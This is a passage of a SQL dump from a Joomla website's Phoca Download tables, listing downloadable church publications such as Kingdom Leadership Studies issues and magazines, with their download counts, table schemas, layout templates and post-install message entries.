(17, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (5th March, 2017)', 'kingdom-leadership-studies-publication-5th-march-2017', 'KLS 5TH MARCH 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-03-05 13:47:42', '2017-03-05 13:47:42', '0000-00-00 00:00:00', 426, 0, 1, 1, 0, '0000-00-00 00:00:00', 15, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(18, 1, 0, 0, 0, 'Daily Mercy Capsule! (365 Days Plus 10 Extra)', 'daily-mercy-capsule-365-days-plus-10-extra', 'Daily Mercy Capsule 365 Days Plus 10 Extra-.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-03-05 13:51:46', '2017-03-05 13:51:46', '0000-00-00 00:00:00', 850, 0, 1, 1, 0, '0000-00-00 00:00:00', 16, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(19, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (19th March, 2017)', 'kingdom-leadership-studies-publication-19th-march-2017', 'KLS 19TH MARCH 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-03-20 19:21:18', '2017-03-20 19:21:18', '0000-00-00 00:00:00', 378, 0, 1, 1, 0, '0000-00-00 00:00:00', 17, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(20, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (26th March, 2017)', 'kingdom-leadership-studies-publication-26th-march-2017', 'KLS 26TH MARCH 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-04-02 11:57:28', '2017-04-02 11:57:28', '0000-00-00 00:00:00', 271, 0, 1, 1, 0, '0000-00-00 00:00:00', 18, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(21, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (2nd April, 2017)', 'kingdom-leadership-studies-publication-2nd-april-2017', 'KLS 2ND APRIL2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-04-02 11:59:11', '2017-04-02 11:59:11', '0000-00-00 00:00:00', 387, 0, 1, 1, 0, '0000-00-00 00:00:00', 19, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(22, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (9th April, 2017)', 'kingdom-leadership-studies-publication-9th-april-2017', 'KLS 9TH APRIL 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-04-09 13:53:23', '2017-04-09 13:53:23', '0000-00-00 00:00:00', 361, 0, 1, 1, 0, '0000-00-00 00:00:00', 20, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(23, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (17th April, 2017)', 'kingdom-leadership-studies-publication-17th-april-2017', 'KLS 16TH APRIL 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-04-17 19:07:06', '2017-04-17 19:07:06', '0000-00-00 00:00:00', 869, 0, 1, 1, 0, '0000-00-00 00:00:00', 21, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(24, 1, 0, 0, 0, 'Easter Faith Seminar 2017 Pamphlet', 'easter-faith-seminar-2017-pamphlet', 'Easther Faith Seminar 2017  pamphlet.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-04-17 19:10:03', '2017-04-17 19:10:03', '0000-00-00 00:00:00', 1211, 0, 1, 1, 0, '0000-00-00 00:00:00', 22, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(25, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (23rd April, 2017)', 'kingdom-leadership-studies-publication-23rd-april-2017', 'KLS 23RD APRIL 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-04-23 15:50:00', '2017-04-23 15:50:00', '0000-00-00 00:00:00', 838, 0, 1, 1, 0, '0000-00-00 00:00:00', 23, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(26, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (30th April, 2017)', 'kingdom-leadership-studies-publication-30th-april-2017', 'KLS 30th APRIL 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-04-30 15:58:00', '2017-04-30 16:58:25', '0000-00-00 00:00:00', 528, 0, 1, 1, 0, '0000-00-00 00:00:00', 24, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(27, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (7th May, 2017)', 'kingdom-leadership-studies-publication-7th-may-2017', 'KLS 7TH MAY 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-05-07 17:02:01', '2017-05-07 17:02:08', '0000-00-00 00:00:00', 520, 0, 1, 1, 0, '0000-00-00 00:00:00', 25, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(28, 1, 0, 0, 0, 'Super Celebration Service & 34th Years Anniversary (14th May, 2017)', 'super-celebration-service-34th-years-anniversary-12th-may-2017', '34th Year Anniversary Pamphlet.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-05-14 16:06:00', '2017-05-14 16:06:00', '0000-00-00 00:00:00', 625, 0, 1, 1, 0, '0000-00-00 00:00:00', 26, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(29, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (21st May, 2017)', 'kingdom-leadership-studies-publication-21st-may-2017', 'KLS21STMAY2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-05-21 18:42:49', '2017-05-21 18:42:49', '0000-00-00 00:00:00', 819, 0, 1, 1, 0, '0000-00-00 00:00:00', 27, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(30, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (28th May, 2017)', 'kingdom-leadership-studies-publication-28th-may-2017', 'KLS28THMAY2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-06-25 10:51:52', '2017-06-25 10:51:52', '0000-00-00 00:00:00', 470, 0, 1, 1, 0, '0000-00-00 00:00:00', 28, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(31, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (4th June, 2017)', 'kingdom-leadership-studies-publication-4th-june-2017', 'KLS4THJUNE2017 1.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-06-25 10:53:14', '2017-06-25 10:53:14', '0000-00-00 00:00:00', 448, 0, 1, 1, 0, '0000-00-00 00:00:00', 29, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(32, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (11th June, 2017)', 'kingdom-leadership-studies-publication-11th-june-2017', 'kls 11TH JUNE 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-06-25 10:54:38', '2017-06-25 10:54:38', '0000-00-00 00:00:00', 527, 0, 1, 1, 0, '0000-00-00 00:00:00', 30, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(33, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (18th June, 2017)', 'kingdom-leadership-studies-publication-18th-june-2017', 'kls18thjune2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-06-25 10:57:26', '2017-06-25 10:57:26', '0000-00-00 00:00:00', 787, 0, 1, 1, 0, '0000-00-00 00:00:00', 31, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(34, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (25th June, 2017)', 'kingdom-leadership-studies-publication-25th-june-2017', 'kls 25th June 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-06-25 10:59:13', '2017-06-25 10:59:13', '0000-00-00 00:00:00', 974, 0, 1, 1, 0, '0000-00-00 00:00:00', 32, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(35, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (16th July, 2017)', 'kingdom-leadership-studies-publication-16th-july-2017', 'KLS16THJULY2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-07-16 10:40:48', '2017-07-16 10:40:48', '0000-00-00 00:00:00', 656, 0, 1, 1, 0, '0000-00-00 00:00:00', 33, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(36, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (23rd July, 2017)', 'kingdom-leadership-studies-publication-23rd-july-2017', 'KLS23RDJULY2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-08-12 18:22:57', '2017-08-12 18:22:57', '0000-00-00 00:00:00', 490, 0, 1, 1, 0, '0000-00-00 00:00:00', 34, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(37, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (30TH July, 2017)', 'kingdom-leadership-studies-publication-30th-july-2017', 'KLS30thJULY2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-08-12 18:24:13', '2017-08-12 18:24:13', '0000-00-00 00:00:00', 613, 0, 1, 1, 0, '0000-00-00 00:00:00', 35, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(38, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (6th August, 2017)', 'kingdom-leadership-studies-publication-6th-august-2017', 'KLS6thAUGUST2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-08-12 18:25:42', '2017-08-12 18:25:42', '0000-00-00 00:00:00', 728, 0, 1, 1, 0, '0000-00-00 00:00:00', 36, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(39, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (13th August, 2017)', 'kingdom-leadership-studies-publication-13th-august-2017', 'KLS13TH AUGUST2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-08-12 18:27:03', '2017-08-12 18:27:03', '0000-00-00 00:00:00', 880, 0, 1, 1, 0, '0000-00-00 00:00:00', 37, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(40, 1, 0, 0, 0, 'Peculiar Women Magazine (August 2017', 'peculiar-women-magazine-august-2017', 'Peculiar Women Magazine.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-08-27 06:15:33', '2017-08-27 06:15:33', '0000-00-00 00:00:00', 911, 0, 1, 1, 0, '0000-00-00 00:00:00', 38, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(41, 1, 0, 0, 0, 'Girl to Girl Magazine (August 2017 Edition)', 'girl-to-girl-magazine-august-2017-edition', 'GIRL TO GIRL 27TH AUG 2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-08-27 06:16:46', '2017-08-27 06:16:46', '0000-00-00 00:00:00', 1996, 0, 1, 1, 0, '0000-00-00 00:00:00', 39, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*'),
(42, 1, 0, 0, 0, 'Kingdom Leadership Studies Publication  (27th August, 2017)', 'kingdom-leadership-studies-publication-27th-august-2017', 'KLS27thAUGUST2017.pdf', '', '', 0, '', '', '', '', '', '', '', '', '', '', '', '', '', '_self', '', '', '_self', '', '', '', '', 0, '', 0, '2017-08-27 06:21:03', '2017-08-27 06:21:03', '0000-00-00 00:00:00', 3958, 0, 1, 1, 0, '0000-00-00 00:00:00', 40, 1, 0, 0, '', 0, '', NULL, '', '', NULL, '*');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_phocadownload_categories`
--

CREATE TABLE `y57u5_phocadownload_categories` (
  `id` int(11) NOT NULL,
  `parent_id` int(11) NOT NULL DEFAULT '0',
  `section` int(11) NOT NULL DEFAULT '0',
  `title` varchar(255) NOT NULL DEFAULT '',
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `image` varchar(255) NOT NULL DEFAULT '',
  `image_position` varchar(30) NOT NULL DEFAULT '',
  `description` text,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `editor` varchar(50) DEFAULT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  `access` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `uploaduserid` text,
  `accessuserid` text,
  `deleteuserid` text,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `count` int(11) NOT NULL DEFAULT '0',
  `hits` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `metakey` text,
  `metadesc` text,
  `metadata` text,
  `language` char(7) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_phocadownload_categories`
--

INSERT INTO `y57u5_phocadownload_categories` (`id`, `parent_id`, `section`, `title`, `name`, `alias`, `image`, `image_position`, `description`, `published`, `checked_out`, `checked_out_time`, `editor`, `ordering`, `access`, `uploaduserid`, `accessuserid`, `deleteuserid`, `date`, `count`, `hits`, `params`, `metakey`, `metadesc`, `metadata`, `language`) VALUES
(1, 0, 0, 'Publications & Magazines', '', 'publications-magazines', '', '', '<p>Download Free E-books, Kingdom Leadership Studies (KLS) Manual, Daughter\'s of Destiny Magazine,Web of Wisdom and so on.</p>', 1, 196, '2017-12-28 12:46:46', NULL, 1, 1, '0', '0', '0', '2016-12-21 00:00:00', 0, 0, NULL, '', '', NULL, '*'),
(2, 0, 0, 'Sermon Notes', '', 'sermon-notes', '', '', '', 1, 0, '0000-00-00 00:00:00', NULL, 2, 1, '0', '0', '0', '2017-02-20 12:43:53', 0, 0, NULL, '', '', NULL, '*');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_phocadownload_file_votes`
--

CREATE TABLE `y57u5_phocadownload_file_votes` (
  `id` int(11) NOT NULL,
  `fileid` int(11) NOT NULL DEFAULT '0',
  `userid` int(11) NOT NULL DEFAULT '0',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `rating` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_phocadownload_file_votes_statistics`
--

CREATE TABLE `y57u5_phocadownload_file_votes_statistics` (
  `id` int(11) NOT NULL,
  `fileid` int(11) NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `average` float(8,6) NOT NULL DEFAULT '0.000000',
  `language` char(7) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_phocadownload_layout`
--

CREATE TABLE `y57u5_phocadownload_layout` (
  `id` int(11) NOT NULL,
  `categories` text,
  `category` text,
  `file` text,
  `checked_out` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `params` text
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_phocadownload_layout`
--

INSERT INTO `y57u5_phocadownload_layout` (`id`, `categories`, `category`, `file`, `checked_out`, `checked_out_time`, `params`) VALUES
(1, '<div class=\"pd-categoriesbox\">\r\n<div class=\"pd-title\">{pdtitle}</div>\r\n{pdsubcategories}\r\n{pdclear}\r\n</div>', '<div class=\"pd-filebox\">\r\n{pdfiledesctop}\r\n{pdfile}\r\n<div class=\"pd-buttons\">{pdbuttondownload}</div>\r\n<div class=\"pd-buttons\">{pdbuttondetails}</div>\r\n<div class=\"pd-buttons\">{pdbuttonpreview}</div>\r\n<div class=\"pd-buttons\">{pdbuttonplay}</div>\r\n<div class=\"pd-mirrors\">{pdmirrorlink2} {pdmirrorlink1}</div>\r\n<div class=\"pd-rating\">{pdrating}</div>\r\n<div class=\"pd-tags\">{pdtags}</div>\r\n{pdfiledescbottom}\r\n<div class=\"pd-cb\"></div>\r\n</div>', '<div class=\"pd-filebox\">\r\n{pdimage}\r\n{pdfile}\r\n{pdfilesize}\r\n{pdversion}\r\n{pdlicense}\r\n{pdauthor}\r\n{pdauthoremail}\r\n{pdfiledate}\r\n{pddownloads}\r\n{pddescription}\r\n{pdfeatures}\r\n{pdchangelog}\r\n{pdnotes}\r\n<div class=\"pd-mirrors\">{pdmirrorlink2} {pdmirrorlink1}</div>\r\n<div class=\"pd-report\">{pdreportlink}</div>\r\n<div class=\"pd-rating\">{pdrating}</div>\r\n<div class=\"pd-tags\">{pdtags}</div>\r\n<div class=\"pd-cb\"></div>\r\n</div>', 0, '0000-00-00 00:00:00', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_phocadownload_licenses`
--

CREATE TABLE `y57u5_phocadownload_licenses` (
  `id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `description` text,
  `checked_out` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `language` char(7) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_phocadownload_logging`
--

CREATE TABLE `y57u5_phocadownload_logging` (
  `id` int(11) UNSIGNED NOT NULL,
  `fileid` int(11) NOT NULL DEFAULT '0',
  `catid` int(11) NOT NULL DEFAULT '0',
  `userid` int(11) NOT NULL DEFAULT '0',
  `ip` varchar(20) NOT NULL DEFAULT '',
  `page` varchar(255) NOT NULL,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `type` tinyint(1) NOT NULL DEFAULT '0',
  `params` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_phocadownload_styles`
--

CREATE TABLE `y57u5_phocadownload_styles` (
  `id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `filename` varchar(255) NOT NULL DEFAULT '',
  `menulink` text,
  `type` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_phocadownload_styles`
--

INSERT INTO `y57u5_phocadownload_styles` (`id`, `title`, `alias`, `filename`, `menulink`, `type`, `published`, `checked_out`, `checked_out_time`, `ordering`, `params`, `language`) VALUES
(1, 'Phocadownload', 'phocadownload', 'phocadownload.css', NULL, 1, 1, 0, '0000-00-00 00:00:00', 1, NULL, '*'),
(2, 'Rating', 'rating', 'rating.css', NULL, 1, 1, 0, '0000-00-00 00:00:00', 2, NULL, '*'),
(3, 'Button', 'button', 'button.css', NULL, 1, 0, 0, '0000-00-00 00:00:00', 3, NULL, '*'),
(4, 'Button (Rounded Corners)', '', 'buttonrc.css', NULL, 1, 0, 0, '0000-00-00 00:00:00', 4, NULL, '*'),
(5, 'Default', 'default', 'default.css', NULL, 2, 1, 0, '0000-00-00 00:00:00', 1, NULL, '*'),
(6, 'Bootstrap', '', 'bootstrap.min.css', NULL, 1, 0, 0, '0000-00-00 00:00:00', 5, NULL, '*');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_phocadownload_tags`
--

CREATE TABLE `y57u5_phocadownload_tags` (
  `id` int(11) NOT NULL,
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `link_ext` varchar(255) NOT NULL DEFAULT '',
  `link_cat` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `description` text,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_phocadownload_tags_ref`
--

CREATE TABLE `y57u5_phocadownload_tags_ref` (
  `id` bigint(20) UNSIGNED NOT NULL,
  `fileid` int(11) NOT NULL DEFAULT '0',
  `tagid` int(11) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_phocadownload_user_stat`
--

CREATE TABLE `y57u5_phocadownload_user_stat` (
  `id` int(11) NOT NULL,
  `fileid` int(11) NOT NULL DEFAULT '0',
  `userid` int(11) NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `language` char(7) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_phocadownload_user_stat`
--

INSERT INTO `y57u5_phocadownload_user_stat` (`id`, `fileid`, `userid`, `count`, `date`, `published`, `ordering`, `language`) VALUES
(1, 4, 0, 433, '2019-09-22 20:13:35', 0, 0, ''),
(2, 1, 0, 743, '2019-09-24 18:41:15', 0, 0, ''),
(3, 3, 0, 354, '2019-09-25 00:46:14', 0, 0, ''),
(4, 2, 0, 338, '2019-09-25 00:45:56', 0, 0, ''),
(5, 5, 0, 2763, '2019-09-25 00:46:31', 0, 0, ''),
(6, 6, 0, 3487, '2019-09-25 01:28:15', 0, 0, ''),
(7, 8, 0, 994, '2019-09-25 00:47:23', 0, 0, ''),
(8, 7, 0, 1012, '2019-09-25 00:46:42', 0, 0, ''),
(9, 9, 0, 472, '2019-09-25 00:47:35', 0, 0, ''),
(10, 10, 0, 451, '2019-09-24 01:51:06', 0, 0, ''),
(11, 11, 0, 532, '2019-09-21 00:46:41', 0, 0, ''),
(12, 12, 0, 799, '2019-09-25 00:48:23', 0, 0, ''),
(13, 13, 0, 446, '2019-09-25 00:49:48', 0, 0, ''),
(14, 14, 0, 349, '2017-05-02 19:21:26', 0, 0, ''),
(15, 15, 0, 117, '2017-05-02 19:19:59', 0, 0, ''),
(16, 16, 0, 340, '2019-09-25 00:50:47', 0, 0, ''),
(17, 18, 0, 850, '2019-09-25 00:51:57', 0, 0, ''),
(18, 17, 0, 426, '2019-09-25 00:51:13', 0, 0, ''),
(19, 19, 0, 378, '2019-09-25 00:52:38', 0, 0, ''),
(20, 21, 0, 387, '2019-09-25 00:53:18', 0, 0, ''),
(21, 20, 0, 271, '2019-09-25 00:53:04', 0, 0, ''),
(22, 22, 0, 361, '2019-09-22 20:04:29', 0, 0, ''),
(23, 24, 0, 1211, '2019-09-21 00:15:49', 0, 0, ''),
(24, 23, 0, 869, '2019-09-21 00:15:55', 0, 0, ''),
(25, 28, 0, 625, '2019-09-21 00:15:23', 0, 0, ''),
(26, 27, 0, 520, '2019-09-21 12:31:58', 0, 0, ''),
(27, 26, 0, 528, '2019-09-25 00:54:05', 0, 0, ''),
(28, 25, 0, 838, '2019-09-21 00:15:42', 0, 0, ''),
(29, 29, 0, 819, '2019-09-23 23:28:10', 0, 0, ''),
(30, 34, 0, 974, '2019-09-21 17:56:41', 0, 0, ''),
(31, 33, 0, 787, '2019-09-23 22:49:30', 0, 0, ''),
(32, 30, 0, 470, '2019-09-23 23:26:31', 0, 0, ''),
(33, 31, 0, 448, '2019-09-21 00:15:04', 0, 0, ''),
(34, 32, 0, 527, '2019-09-21 00:14:58', 0, 0, ''),
(35, 35, 0, 656, '2019-09-21 00:14:39', 0, 0, ''),
(36, 39, 0, 880, '2019-09-25 00:38:20', 0, 0, ''),
(37, 38, 0, 728, '2019-09-25 00:53:41', 0, 0, ''),
(38, 36, 0, 490, '2019-09-24 16:36:04', 0, 0, ''),
(39, 37, 0, 613, '2019-09-21 00:14:26', 0, 0, ''),
(40, 40, 0, 911, '2019-09-25 00:35:37', 0, 0, ''),
(41, 42, 0, 3958, '2019-09-25 00:32:14', 0, 0, ''),
(42, 41, 0, 1996, '2019-09-25 00:34:39', 0, 0, '');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_postinstall_messages`
--

CREATE TABLE `y57u5_postinstall_messages` (
  `postinstall_message_id` bigint(20) UNSIGNED NOT NULL,
  `extension_id` bigint(20) NOT NULL DEFAULT '700' COMMENT 'FK to #__extensions',
  `title_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Lang key for the title',
  `description_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Lang key for description',
  `action_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `language_extension` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'com_postinstall' COMMENT 'Extension holding lang keys',
  `language_client_id` tinyint(3) NOT NULL DEFAULT '1',
  `type` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'link' COMMENT 'Message type - message, link, action',
  `action_file` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT '' COMMENT 'RAD URI to the PHP file containing action method',
  `action` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT '' COMMENT 'Action method name or URL',
  `condition_file` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL COMMENT 'RAD URI to file holding display condition method',
  `condition_method` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL COMMENT 'Display condition method, must return boolean',
  `version_introduced` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '3.2.0' COMMENT 'Version when this message was introduced',
  `enabled` tinyint(3) NOT NULL DEFAULT '1'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_postinstall_messages`
--

INSERT INTO `y57u5_postinstall_messages` (`postinstall_message_id`, `extension_id`, `title_key`, `description_key`, `action_key`, `language_extension`, `language_client_id`, `type`, `action_file`, `action`, `condition_file`, `condition_method`, `version_introduced`, `enabled`) VALUES
(1, 700, 'PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_TITLE', 'PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_BODY', 'PLG_TWOFACTORAUTH_TOTP_POSTINSTALL_ACTION', 'plg_twofactorauth_totp', 1, 'action', 'site://plugins/twofactorauth/totp/postinstall/actions.php', 'twofactorauth_postinstall_action', 'site://plugins/twofactorauth/totp/postinstall/actions.php', 'twofactorauth_postinstall_condition', '3.2.0', 1),
(2, 700, 'COM_CPANEL_WELCOME_BEGINNERS_TITLE', 'COM_CPANEL_WELCOME_BEGINNERS_MESSAGE', '', 'com_cpanel', 1, 'message', '', '', '', '', '3.2.0', 1),
(3, 700, 'COM_CPANEL_MSG_STATS_COLLECTION_TITLE', 'COM_CPANEL_MSG_STATS_COLLECTION_BODY', '', 'com_cpanel', 1, 'message', '', '', 'admin://components/com_admin/postinstall/statscollection.php', 'admin_postinstall_statscollection_condition', '3.5.0', 1),
